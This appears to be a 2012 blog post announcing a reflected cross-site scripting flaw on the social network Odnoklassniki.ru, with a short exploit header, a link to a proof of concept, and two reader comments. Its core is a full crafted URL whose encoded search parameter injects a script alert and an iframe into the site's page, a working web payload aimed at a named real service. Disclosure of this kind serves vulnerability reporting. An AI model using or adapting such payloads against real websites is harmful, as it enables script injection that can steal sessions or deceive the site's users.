duminică, 15 aprilie 2012

Odnoklassniki.ru Cross Site Scripting

# Date: 15.04.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/
# PoC:
http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html
..................................................................
 
Well, we have a cross site scripting on Odnoklassniki.ru
 
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
 
or
 
http://codepad.org/kKjrrn76
 












2 comentarii:

Vitaly Kulikov spunea...

nice, have you more of this bugs on odnoklassniki?

Sony spunea...

What do you mean? How to use this? You can see in google about it.

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.